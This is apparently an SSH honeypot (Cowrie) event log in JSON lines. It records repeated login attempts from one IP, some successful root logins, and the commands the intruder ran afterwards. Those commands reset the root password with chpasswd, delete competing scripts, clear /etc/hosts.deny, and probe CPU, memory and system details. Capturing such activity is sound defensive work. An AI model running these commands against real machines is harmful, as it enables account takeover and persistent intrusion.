{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:30.953849Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:34:31.771602Z","src_ip":"212.227.235.229","session":"549ee0d0c171"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:31.949300Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"echo \"root:GHc7i5RYIyVc\"|chpasswd|bash","message":"CMD: echo \"root:GHc7i5RYIyVc\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T04:34:31.950110Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:32.042423Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:32.043460Z","src_ip":"212.227.235.229","session":"549ee0d0c171"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/fefd57c0c78654a2ec33cb9c2eb3a25c4a79310bad6cb348cd802112dafa896b","size":21,"shasum":"fefd57c0c78654a2ec33cb9c2eb3a25c4a79310bad6cb348cd802112dafa896b","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/fefd57c0c78654a2ec33cb9c2eb3a25c4a79310bad6cb348cd802112dafa896b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:32.201133Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:32.781526Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T04:34:32.782471Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.036959Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.038162Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33536,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e2aaf04d380","protocol":"ssh","message":"New connection: 212.227.235.229:33536 (1.2.3.4:22) [session: 6e2aaf04d380]","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.461424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.462351Z","src_ip":"212.227.235.229","session":"6e2aaf04d380"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:33.600312Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.601246Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.604872Z","src_ip":"212.227.235.229","session":"6e2aaf04d380"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.853786Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.login.failed","username":"binance","password":"binance123","message":"login attempt [binance/binance123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:34:33.879359Z","src_ip":"212.227.235.229","session":"6e2aaf04d380"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:34.373319Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T04:34:34.373999Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":26,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:34.625080Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:34.957034Z","src_ip":"212.227.235.229","session":"6e2aaf04d380"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:35.221070Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T04:34:35.221811Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T04:34:35.222437Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:35.473922Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:35.992605Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T04:34:35.993395Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:36.243932Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:36.830770Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T04:34:36.831551Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:37.082116Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:37.638726Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T04:34:37.639420Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:37.890564Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:38.407954Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:34:38.408667Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:38.659954Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:39.251304Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T04:34:39.252042Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:39.503572Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:40.066869Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T04:34:40.067586Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:40.318563Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:40.838308Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T04:34:40.839132Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:41.089901Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:41.688225Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T04:34:41.689088Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:41.939831Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:42.459223Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T04:34:42.460077Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:42.711790Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:43.306413Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T04:34:43.307210Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:43.559659Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.closed","duration":"26.4","message":"Connection lost after 26.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:43.560928Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39150,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d009b71cd90","protocol":"ssh","message":"New connection: 212.227.235.229:39150 (1.2.3.4:22) [session: 3d009b71cd90]","sensor":"my-vps","timestamp":"2025-08-26T04:34:54.652500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:54.653443Z","src_ip":"212.227.235.229","session":"3d009b71cd90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:54.974806Z","src_ip":"212.227.235.229","session":"3d009b71cd90"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Admin@123","message":"login attempt [postgres/Admin@123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:34:56.177475Z","src_ip":"212.227.235.229","session":"3d009b71cd90"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:57.459323Z","src_ip":"212.227.235.229","session":"3d009b71cd90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44348,"dst_ip":"1.2.3.4","dst_port":22,"session":"992ccaa47780","protocol":"ssh","message":"New connection: 212.227.235.229:44348 (1.2.3.4:22) [session: 992ccaa47780]","sensor":"my-vps","timestamp":"2025-08-26T04:35:30.269811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:35:30.270598Z","src_ip":"212.227.235.229","session":"992ccaa47780"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:35:30.346183Z","src_ip":"212.227.235.229","session":"992ccaa47780"}
{"eventid":"cowrie.login.failed","username":"stserver","password":"stserver","message":"login attempt [stserver/stserver] failed","sensor":"my-vps","timestamp":"2025-08-26T04:35:30.687881Z","src_ip":"212.227.235.229","session":"992ccaa47780"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:31.766921Z","src_ip":"212.227.235.229","session":"992ccaa47780"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:35:33.273458Z","src_ip":"212.227.235.229","session":"6775f914595d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51614,"dst_ip":"1.2.3.4","dst_port":22,"session":"b852d6598ba0","protocol":"ssh","message":"New connection: 212.227.235.229:51614 (1.2.3.4:22) [session: b852d6598ba0]","sensor":"my-vps","timestamp":"2025-08-26T04:35:38.652134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:35:38.653123Z","src_ip":"212.227.235.229","session":"b852d6598ba0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41474,"dst_ip":"1.2.3.4","dst_port":22,"session":"683dcba20959","protocol":"ssh","message":"New connection: 212.227.235.229:41474 (1.2.3.4:22) [session: 683dcba20959]","sensor":"my-vps","timestamp":"2025-08-26T04:35:39.953938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:35:39.954946Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:35:40.223154Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu20svm","message":"login attempt [root/ubuntu20svm] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:35:41.340827Z","src_ip":"212.227.235.229","session":"683dcba20959"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:35:41.940769Z","src_ip":"212.227.235.229","session":"683dcba20959"}
